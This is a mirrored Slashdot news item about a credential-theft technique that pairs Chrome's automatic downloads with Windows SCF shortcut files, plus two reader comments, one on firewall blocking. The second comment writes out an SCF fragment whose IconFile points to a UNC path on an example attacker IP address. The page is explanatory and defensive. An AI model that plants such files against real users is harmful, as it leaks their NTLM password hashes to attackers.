Slashdot Mirror

← Back to Stories (view on slashdot.org)

Stealing Windows Credentials Using Google Chrome (helpnetsecurity.com)

Posted by EditorDavid on from the browser-bugs dept.

Orome1 writes: A default setting in Google Chrome, which allows it to download files that it deems safe without prompting the user for a download location, can be exploited by attackers to mount a Windows credential theft attack using specially-crafted SCF shortcut files, DefenseCode researchers have found. What's more, for the attack to work, the victim does not even have to run the automatically downloaded file. Simply opening the download directory in Windows File Explorer will trigger the code icon file location inserted in the file to run, and it will send the victim's username, domain and NTLMv2 password hash to a remote SMB server operated by the attackers.

2 of 53 comments (clear)

  1. Firewall Blocked by darkain · · Score: 5, Informative

    And this is EXACTLY why all of the LAN > WAN firewalls I manage have SMB/CIFS blocked. There is no reason to send that traffic over WAN. If it is needed for connection to a remote location, that's what a VPN connection is for.

  2. Re:Not a browser problem by Hank+the+Lion · · Score: 5, Informative

    Mod parent (and GGP) up.
    This is a Widows vulnerability in the way link files are handled, that is mischaracterised as a Chrome vulnerability by the author of the article.
    Link files (.LNK and .SCF as well as autorun.inf and maybe others) do not contain the pretty icon that is shown in Windows Explorer, but contain a link address to the file containing the icon.

    [Shell]
    IconFile=MyPic.ico, or
    IconFile=MyProgram.exe

    This is the case that was originally targeted by the developers of Windows.
    Then came network filesystems. Now, this would also work:
    IconFile=\\MyServer\Dir\MyProgram.exe, or even worse:
    IconFile=\\180.180.180.180\Dir\MyProgram.exe, where 180.180.180.180 is a server under control of the attacker.

    When connecting to a server, Windows helpfully sends your current login credentials, to prevent you from having to re-type them every time.
    Only when these do not work does it display a login prompt.

    The catch is, that, when you open the directory in which the file is stored in Explorer, the icon is needed for display, and the scf file specifies an icon file on a remote server. So, Explorer accesses the remote server, and the underlying network file system sends your login credentials.

    Google has tried to mitigate this problem by adding a .download extension to .LNK files, but had overlooked that .SCF can do exactly the same. Ultimately, this is not Google's fault. The Windows network system should not send login credentials to a server that the user hasn't authenticated to manually before, or should only use authentication mechanisms that are immune to replay attacks or brute forcing. See Wafflemonster's post above.

    This is an issue that should be addressed by Microsoft for once and for all at the filesystem level, not by browser makers with patchwork on a case-by-case basis.